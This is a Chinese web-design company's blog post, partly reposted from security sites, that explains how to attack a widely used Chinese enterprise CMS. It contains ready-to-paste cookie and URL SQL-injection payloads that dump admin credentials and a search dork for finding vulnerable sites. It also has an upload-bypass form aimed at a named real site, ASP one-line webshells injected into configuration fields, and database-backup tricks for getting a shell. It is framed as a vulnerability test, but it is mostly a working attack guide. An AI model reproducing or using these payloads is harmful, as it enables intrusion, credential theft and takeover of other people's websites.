青海网站建设、网络推广最好的公司--您身边的网站建设专家,马上拿起电话,联系我们:0971-8235355   
青海西宁网站建设、网站制作公司-西宁威势电子信息服务有限公司 首页 |  公司简介 |  网站建设 |  网络推广 |  空间租用 |  域名注册 |  企业邮局 |  网络安全 |  网站编程 |  客服中心 |  联系我们 |  人才招聘
 
西宁威势最新网站制做案例展示
Lastest Project
 
西宁网站建设  
当前位置为:首页 >> 脚本安全 >> 正文  
[原创]南方企业网站管理系统网站后台密码读取工具

文章来源: 西宁威势电子信息服务有限公司     发布时间:2008-12-6    浏览次数:20552    tags:南方企业 网站管理系统 密码 注入 漏洞

    Jessica以前给我发过一套系统,说是有漏洞让我研究一下,结果就这样认识了这套系统,据JESSICA介绍才知道,这套系统的名字叫做南方企业网站管理系统,用的人还挺多的,好多企业的网站都是用这套系统来搭建的,包括青海本地好多公司的网站,可是这套系统有着很严重的漏洞,好多人对它视而不见,该漏洞可以引起网站被黑或是后台资料被删除等后果,今天闲着无聊,自己随手写了一个该网站程序的漏洞测试工具,使用很简单,只需要打开你的网站(前提是使用前面所述的网站管理系统),找一篇文章打开,然后把浏览器中的地址写到工具的提交表单中,点击提交就可以,如果你的后台的密码和用户名被成功的读取出来的话,那么就证明你的网站有漏洞,要修补了!!

以下是引用片段:
http://www.qhwins.com/MyCode/hacker/CookiesHack.asp

     小提示,在GOOGLE中搜索“inurl:"/ProductShow.asp?ArticleID="”会出来N多网站,基本上都是上面的系统做的,几乎95%都可以拿到密码。

之二:

    对于另一版本的程序(具体版本号不详),用上面的方法是取不到密码的,可是漏洞依然存在,用以下代码在浏览器中提交,然后刷新,即可看到密码。

第一步,浏览某一文章,如:

http://www.qhwins.com/shownews.asp?id=65

第二步,清空浏览器地址栏,输入以下代码,回车。

javascript:alert(document.cookie="id="+escape("65 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))

第三部,在地址栏输入http://www.qhwins.com/shownews.asp 并刷新,即可看到密码。

一点小技巧,往往我们暴出来的密码,MD5的时候要麻收费,要麻查不出来,这时候我们可以试试网站有没有其它管理员存在,或许存在着弱口令呢,OK,改一下上面的注入语句,把当前默认管理员的ID暴出来

javascript:alert(document.cookie="id="+escape("91 and 1=2 union select 1,username,password,4,5,6,7,id,9,10 from Admin"))

提交并刷新页面后页面返回

admin
发布时间:10

d9ba59abbe56e0c7

 

注意看发布时间的后面10代表当前用户的ID,OK,有了这个ID,我们改变语句,再暴其它管理员的帐户,接着来

javascript:alert(document.cookie="id="+escape("91 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin where id>10"))

提交,然后重新刷新页面,OK,又暴出来了一个管理员帐户,并且是弱口令,拿到CMD5上面一查,密码123456,成功登录后台。

Found:  /admin/southidceditor/popup.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/UpFile.asp?gl=file  (HTTP/1.1 500 Internal Server Error)  !!
Found:  /admin/southidceditor/popup.asp   (HTTP/1.1 200 OK)  !!!
Found:  /admin/SouthidcEditor/ewebeditor.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/picture.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/upfile.asp  (HTTP/1.1 200 OK)  !!!
Found:  /inc/  (HTTP/1.1 403 Forbidden)  !!!
Found:  /admin/ewebeditor/  (HTTP/1.1 403 Forbidden)  !!!
Found:  /inc/conn.asp  (HTTP/1.1 200 OK)  !!!
Found:  /UploadFiles/  (HTTP/1.1 403 Forbidden)  !!!
Found:  /xml/  (HTTP/1.1 403 Forbidden)  !!!
Found:  /scripts/  (HTTP/1.1 403 Forbidden)  !!!
Found:  /admin/admin.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/SiteConfig.asp  (HTTP/1.1 200 OK)  !!!
Found:  /inc/conn.asp  (HTTP/1.1 200 OK)  !!!
Found:  /  (HTTP/1.1 200 OK)  !!!
Found:  /foot.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/conn.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/UpFile.asp?fp1=D:  (HTTP/1.1 200 OK)  !!!
Found:  /admin/eWebEditor/admin_login.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/ewebeditor/ewebeditor.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/SouthidcEditor/Dialog/help/main.htm  (HTTP/1.1 200 OK)  !!!
Found:  /admin/SouthidcEditor/Upload.asp  (HTTP/1.1 200 OK)  !!!
Found:  /admin/login.asp  (HTTP/1.1 200 OK)  !!!

/Southidceditor/admin_style.asp?action=copy&id=14
/SouthidcEditor/Admin_Style.asp?action=styleset&id=47
/Southidceditor/ewebeditor.asp?id=57&style=southidc
/Southidceditor/Datas/SouthidcEditor.mdb
/Southidceditor/login.asp

以上内容原创,以下内容为转载

南方数据编辑器(southidceditor)我也来暴个注入0day漏洞及搞webshell方法
2010-06-22 17:09

1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7

也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7

直接暴管理员帐号密码(md5)

2.登陆后台

3.利用编辑器上传:

访问admin/southidceditor/admin_style.asp

修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.

========================================

参考资料整理:

南方数据、良精系统、网软天下漏洞利用

www.hx99.net     时间: 2009-12-18     阅读: 28次      整理: 华西安全网

1、通过upfile_other.asp漏洞文件直接取SHELL

直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:

<HTML><HEAD>  
<META http-equiv=Content-Type content="text/html; charset=gb2312">  
<STYLE type=text/css>BODY {  
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee  
}  
.tx1 {  
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px  
}  
</STYLE>

<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>  
<BODY leftMargin=0 topMargin=0>  
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post  
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>  
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>

将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。

注:此方法通杀南方数据、良精系统、网软天下等

2、通过注入秒杀管理员帐号密码,使用如下:

http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’

以上代码直接暴管理员帐号和密码,取SHELL方法如下:

在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’

成功把shell写入http://www.target.com/inc/config.asp

这里一句话chr(32)密码是“#”

3、cookie注入

清空地址栏,利用union语句来注入,提交:

javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))

如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?

注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。

(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)

三、后台取SHELL方法总结

(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:

然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,

这时再打开一句话马的客户端,提交同样得到一个小马

(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)

(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:

if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
                    EnableUpload=false
               end if
               if EnableUpload=false then
                      msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
                      FoundErr=true
               end if

大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:


提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)

(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的

点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的

直接访问备份后的地址,就得到一个webshell


(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)


上一篇:[原创]对一个常见经典的上传程序漏洞的修补过程
下一篇:本人N年前写的文章,注入影子鹰
评论列表
正在加载评论……
  
评论   
呢  称:
验证码: 若看不清请点击更换!
内  容:
 
 
  在线洽谈咨询:
点击这里,在线洽谈   点击这里,在线洽谈   点击这里,在线洽谈
与我交谈  与我交谈 与我交谈
乘车路线    汇款方式   加盟合作  人才招聘  
公司地址:青海省西宁市西关大街73号(三二四部队招行所四楼)     青ICP备13000578号-1 公安机关备案号:63010402000123    
QQ:147399120    mail:lostlove000@163.com    电话: 13897410341    邮编:810000
© Copyright( 2008-2009) QhWins.Com All Rights Reserved    版权所有:西宁威势电子信息服务有限公司 未经书面制授权,请勿随意转载!
业务:青海网站制做青海网站建设青海网页设计西宁网站制做西宁网站建设青海域名注册青海网络推广青海网站推广青海空间租用青海软件开发网站安全网络安全